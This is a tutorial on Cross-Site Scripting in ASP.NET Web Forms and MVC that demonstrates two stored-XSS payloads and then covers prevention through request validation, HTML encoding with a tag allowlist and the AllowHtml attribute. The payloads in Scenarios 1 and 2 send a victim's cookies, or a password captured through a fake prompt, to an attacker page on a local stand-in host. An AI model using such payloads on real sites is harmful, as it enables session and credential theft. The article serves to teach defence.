Cross-Site Scripting (XSS) Attack And Its Prevention Mechanism

In this article, you will learn how a Cross-Site Scripting (XSS) attack works and how to prevent it.

An XSS attack exploits weak input validation in a web page by injecting client-side script. Online you can find many examples of this kind of attack, but in this article I am going to show you a few real-world examples.

XSS Attack Examples with Real-World Scenarios

We know that attackers can inject their scripts through the victim's browser (for example, through input fields). Let's look at a few scenarios:

Scenario #1

Using a cookie, an attacker can steal a victim's username and password and save the credentials in his/her own database.

Here we have a victim's page like this:

[Screenshot: victim page markup]

And the code-behind file as below:

[Screenshot: code-behind file]

Now the attacker can inject the following script into an input control of the web page:

<script>window.open('http://localhost:62887/XSS/AttackerPage.aspx?cookie='+document.cookie,'_blank')</script>


[Screenshot: login page]

We enter the above script in any one of the input controls of the web page and submit the form; whatever we entered in the input textboxes will then go to the attacker's database. Please refer to the screenshots below.

[Screenshot #1: login page]

[Screenshot #2: login page]

When we refresh the browser, the credential will be saved in the victim's database.

[Screenshot #1: login page]

[Screenshot #2: stored cookies]

And by using those credentials, the attacker can do anything he/she wants with the victim's database.

Scenario #2

The injected script shows a prompt box asking the end user to verify his/her password; once the user enters the password, it is saved in the attacker's database.

Once the attacker enters the script below into one of the input controls of the web page and submits the form, the script itself is saved in the database. If you look at the script, the attacker has placed his/her own web page address in the "window.open" call.

  <script>
      // Ask the victim for the password under a false pretext.
      var pwd = prompt("please verify your password for security reason", "");
      if (pwd != null)
      {
          // Send whatever was typed to the attacker's page as a query string parameter.
          window.open('http://localhost:62887/XSS/AttackerPage.aspx?password=' + pwd, '_blank');
      }
  </script>
Web page screenshot:

[Screenshot: web page]

After clicking on the Submit button:

[Screenshot: web page]

[Screenshot: stored comment]

After refreshing the browser, the end user gets a prompt box like the one below:

[Screenshot: prompt box]

After entering a password in this prompt box and clicking the OK button, the entered password is saved in the attacker's database, as shown below:

[Screenshot: prompt box]

After clicking on the OK button:

[Screenshot: OK button]

[Screenshot: saved record id]

The attacker's web page code-behind file is as below:

AttackerPage.aspx.cs

[Screenshot: AttackerPage.aspx.cs code]

Prevention mechanism

Prevention mechanism when we work with a Web Forms application:

Attackers can strike in various ways, so we have to protect our web application against every kind of attack scenario. The possible ways to prevent an XSS attack are as follows:

Step 1: Check that ASP.NET request validation is enabled.
Step 2: Verify ASP.NET code that generates HTML output.
Step 3: Find out whether HTML output includes input parameters.
Step 4: Check potentially dangerous HTML attributes and tags.
Step 5: Find out countermeasures.

By default, request validation is enabled in Machine.config.

If we set ValidateRequest="true" or remove the ValidateRequest page attribute and browse to the page again, the following error message will be displayed.

As we know, the ValidateRequest page attribute is true by default for a web form, so when the attacker enters any malicious XSS script (for instance "<script>alert ('hello..."), request validation on Request.Form detects this kind of injection and rejects the input because it includes potentially dangerous HTML characters.

For example:

[Screenshot: sample code]

Output:

[Screenshot: output]

Encode HTML Tags

Encode the string input using the HtmlEncode method. Then use a StringBuilder and call its Replace method to selectively remove the encoding on the HTML elements that you want to permit. Sample code with screenshot as below:

[Screenshot: sample code]

Or you can write a regular expression that replaces HTML tags with their encoded characters. Sample code as below:

[Screenshot: sample code]

Whatever we apply on the client side is not enough, because we can't trust client-side code, so we have to handle it in the code-behind file as well. Sample code as below:

[Screenshot: sample code]
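The following is an added example, not the article's own code, covering the three points above: HtmlEncode plus a StringBuilder.Replace allowlist, the same allowlist as a regular expression, and calling it from the Web Forms code-behind. SafeHtml, CommentPage, txtComment and btnSubmit_Click are assumed names, and the allowed tag list is a choice for this example.

```csharp
using System;
using System.Text;
using System.Text.RegularExpressions;
using System.Web;   // System.Web.dll: HttpUtility.HtmlEncode

public static class SafeHtml
{
    // Tags this example chooses to permit. They are matched only in their bare
    // form (<b>, </b>); a tag carrying attributes such as <b onclick=...> never
    // matches, so it stays encoded, as does every other tag including <script>.
    private static readonly string[] AllowedTags = { "b", "i", "u", "br" };

    // Approach 1: HtmlEncode everything, then StringBuilder.Replace re-enables
    // only the exact allowed open/close tags (case-sensitive: <B> stays encoded).
    public static string EncodeWithAllowlist(string input)
    {
        if (string.IsNullOrEmpty(input)) return string.Empty;

        // After this line < > & and quotes are all inert text.
        var sb = new StringBuilder(HttpUtility.HtmlEncode(input));

        foreach (var tag in AllowedTags)
        {
            sb.Replace("&lt;" + tag + "&gt;", "<" + tag + ">");
            sb.Replace("&lt;/" + tag + "&gt;", "</" + tag + ">");
        }
        return sb.ToString();
    }

    // Approach 2: one regular expression over the encoded string. $1 is the
    // optional slash, $2 the tag name; IgnoreCase treats <B> like <b>.
    private static readonly Regex AllowedTagPattern = new Regex(
        @"&lt;(/?)(" + string.Join("|", AllowedTags) + @")&gt;",
        RegexOptions.IgnoreCase | RegexOptions.Compiled);

    public static string EncodeWithRegex(string input)
    {
        if (string.IsNullOrEmpty(input)) return string.Empty;
        return AllowedTagPattern.Replace(HttpUtility.HtmlEncode(input), "<$1$2>");
    }
}

// Code-behind of the comment page: encode on the server before the value is
// stored or rendered, regardless of any client-side check. The txtComment and
// lblComment controls are assumed to be declared in the designer file.
public partial class CommentPage : System.Web.UI.Page
{
    protected void btnSubmit_Click(object sender, EventArgs e)
    {
        lblComment.Text = SafeHtml.EncodeWithAllowlist(txtComment.Text);
    }
}
```

With either method, a submitted "<b>Hi</b><script>...</script>" keeps the bold tag working while the script tag is rendered as literal text.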

Use of AllowHtml Attribute in MVC

Sometimes we have a requirement to save HTML data in the database, and our application is built in MVC rather than as an ASP.NET Web Forms application. By default, ASP.NET MVC does not allow a user to submit HTML tags, in order to protect the application from Cross-Site Scripting attacks. I have an MVC application, and my page is as below:

Now I am entering an HTML tag in the Content field, which looks like this:

[Screenshot: Content field]

After clicking the CREATE button, the page looks like this:

[Screenshot: error page]

So to overcome this type of error in MVC applications, we have to use the "AllowHtml" attribute in our model class. Now I am applying this attribute to the Content property of the AllowHtmlModel class, like this:

[Screenshot: AllowHtmlModel class]

If we write the model class like this, our MVC application will accept HTML tags in the field to which the AllowHtml attribute is applied, but not in other fields.
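As an added example (not the article's own code), the model below applies AllowHtml to Content only, and, going slightly beyond the article, the controller contrasts it with the action-level ValidateInput(false), which turns request validation off for every field of the request. AllowHtmlController, the Title property and the action names are assumed.

```csharp
using System.ComponentModel.DataAnnotations;
using System.Web.Mvc;

// Request validation is switched off for Content alone; Title is still
// rejected with "A potentially dangerous Request.Form value was detected"
// whenever it contains markup.
public class AllowHtmlModel
{
    public int Id { get; set; }

    [Required, StringLength(100)]
    public string Title { get; set; }      // "<b>x</b>" here is still rejected

    [AllowHtml]
    public string Content { get; set; }    // markup accepted for this field only
}

public class AllowHtmlController : Controller
{
    // Preferred: validation stays on for the rest of the model.
    [HttpPost, ValidateAntiForgeryToken]
    public ActionResult Create(AllowHtmlModel model)
    {
        if (!ModelState.IsValid) return View(model);

        // Store model.Content as-is (the article's requirement). Because input
        // validation was disabled for it, the view must render it with
        // @Model.Content, which Razor HTML-encodes; @Html.Raw(Model.Content)
        // would execute any stored <script> and reintroduce stored XSS.
        TempData["Saved"] = model.Title;
        return RedirectToAction("Index");
    }

    // Weaker alternative: disables request validation for Title, Content and
    // every other value in the request, not just the one field that needs it.
    [HttpPost, ValidateAntiForgeryToken, ValidateInput(false)]
    public ActionResult CreateUnvalidated(AllowHtmlModel model)
    {
        return Create(model);
    }
}
```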